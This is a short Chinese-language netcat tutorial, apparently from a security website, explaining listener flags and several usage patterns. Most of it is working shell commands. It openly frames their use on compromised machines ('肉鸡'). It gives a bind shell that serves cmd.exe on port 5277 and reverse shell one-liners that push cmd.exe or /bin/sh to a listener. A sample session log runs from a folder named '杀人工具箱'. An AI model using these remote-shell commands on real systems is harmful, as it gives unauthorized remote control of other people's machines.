-l：监听端口，监听入站信息
　　-p：后跟本地端口号
　　-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息

　　使用1、程序转向  被动式的
　　TELNET的肉鸡
　　nc -l -p 5277 -t -e cmd.exe
　　监听本地端口5277的
　　入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。

　　咱们来找台肉鸡试试，我TELNET IP 5277
　　在linux上,就可以用nc去连,得到shell

　　使用2、反弹式的 非常有用
　　local:nc -l -v -p 5277
　　romot:nc -e cmd.exe ip 5277 

　　使用3、在linux下如何编译nc和使用nc
　　从http://netcat.sourceforge.net/download.php下载下来代码之后，
　　./configure
　　make
　　即可，程序名仍然是nc
　　romot:nc ip 5277 -e /bin/sh哈哈
　　local:nc -l -v -p 5277

　　使用4、NC端口正确应答
　　romot:nc -l -v -p 57  //IP是104   这里并没有转控制权
　　local:nc -v 192.168.1.104 57
　　local接着就可以写应答信息了，对方就可以收到

　　local
　　C:\Documents and Settings\Administrator>C:\同步\杀人工具箱\端口转发\nc.exe -vv -lp 57
　　listening on [any] 57 ...
　　connect to [192.168.1.120] from SK [192.168.1.104] 5829
　　hello
　　romot
　　C:\Documents and Settings\Administrator>C:\同步\杀人工具箱\端口转发\nc.exe -v 192.168.1.101 5050
　　什么端口open什么的
　　然后就可以用dir等命令了

　　注意：NC在VPN环境下不能直联

本站技术原创栏目文章均为中睿原创或编译，转载请注明：文章来自中睿，本站保留追究责任的权利。